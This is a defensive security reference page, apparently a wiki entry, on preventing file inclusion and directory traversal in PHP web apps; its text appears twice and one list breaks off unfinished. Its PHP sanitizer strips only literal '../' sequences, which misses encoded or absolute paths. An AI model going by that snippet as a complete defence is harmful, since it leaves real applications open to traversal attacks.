FILE INCLUSION

File inclusion is a security flaw that occurs in web applications when an attacker can manipulate the way files are included or loaded within the application. this vulnerability arise when user input is used to determine the path or file that the application includes, without proper validation or sanitization.

MITIGATION

Sanitize User Input: Always sanitize and validate user input before using it in file inclusion operations.
Use Whitelists: Instead of allowing arbitrary file paths, use predefined whitelists of acceptable files or paths.
Disable allow_url_include: In PHP, ensure that allow_url_include is disabled in the php.ini configuration file.
Use Absolute Paths: Avoid using relative paths based on user input, and instead rely on predefined, fixed paths.
Limit File Permissions: Restrict file access permissions to only necessary files and directories.

PREVENTION

HARDENING

utilize a Web Application Firewall (WAF), such as ModSecurity
- ModSecurity minimizes false positives by offering a permissive mode, which will only report things it would have blocked. This lets defenders tune the rules to make sure no legitimate request is blocked. just having the WAF in permissive mode can be an early warning sign that an application is being attacked

FILE INCLUSION

Avoid passing any user-controlled inputs into any file inclusion functions or APIs
Utilize a limited whitelist of allowed user inputs, and match each input to the file to be loaded, while having a default value for all other inputs
globally disable the inclusion of remote files in web server configurations.
- In PHP this can be done by setting allow_url_fopen and allow_url_include to Off
lock web applications to their web root directory to prevent attackers from accessing non-web related files
- In PHP that can be done by adding open_basedir = /var/www in the php.ini file
- also, ensure that certain potentially dangerous modules are disabled, like

DIRECTORY TRAVERSAL

use a function that reads the path, but only return the filename portion
sanitize user input to recursively remove any attempts of traversing directories

#PHP script that sanitizes user input
while(substr_count($input, '../', 0)) {
    $input = str_replace('../', '', $input);
};

 * this code recursively removes ../ sub-strings

PreviousINSECURE FUNCTION CALLS NextLFI

Last updated 2 months ago

MITIGATION

Sanitize User Input: Always sanitize and validate user input before using it in file inclusion operations.

Use Whitelists: Instead of allowing arbitrary file paths, use predefined whitelists of acceptable files or paths.

Disable allow_url_include: In PHP, ensure that allow_url_include is disabled in the php.ini configuration file.

Use Absolute Paths: Avoid using relative paths based on user input, and instead rely on predefined, fixed paths.

Limit File Permissions: Restrict file access permissions to only necessary files and directories.

HARDENING

utilize a Web Application Firewall (WAF), such as ModSecurity

ModSecurity minimizes false positives by offering a permissive mode, which will only report things it would have blocked. This lets defenders tune the rules to make sure no legitimate request is blocked. just having the WAF in permissive mode can be an early warning sign that an application is being attacked

FILE INCLUSION

Avoid passing any user-controlled inputs into any file inclusion functions or APIs

Utilize a limited whitelist of allowed user inputs, and match each input to the file to be loaded, while having a default value for all other inputs

globally disable the inclusion of remote files in web server configurations.

In PHP this can be done by setting allow_url_fopen and allow_url_include to Off

lock web applications to their web root directory to prevent attackers from accessing non-web related files

In PHP that can be done by adding open_basedir = /var/www in the php.ini file
also, ensure that certain potentially dangerous modules are disabled, like

DIRECTORY TRAVERSAL

use a function that reads the path, but only return the filename portion

sanitize user input to recursively remove any attempts of traversing directories

#PHP script that sanitizes user input
while(substr_count($input, '../', 0)) {
    $input = str_replace('../', '', $input);
};

 * this code recursively removes ../ sub-strings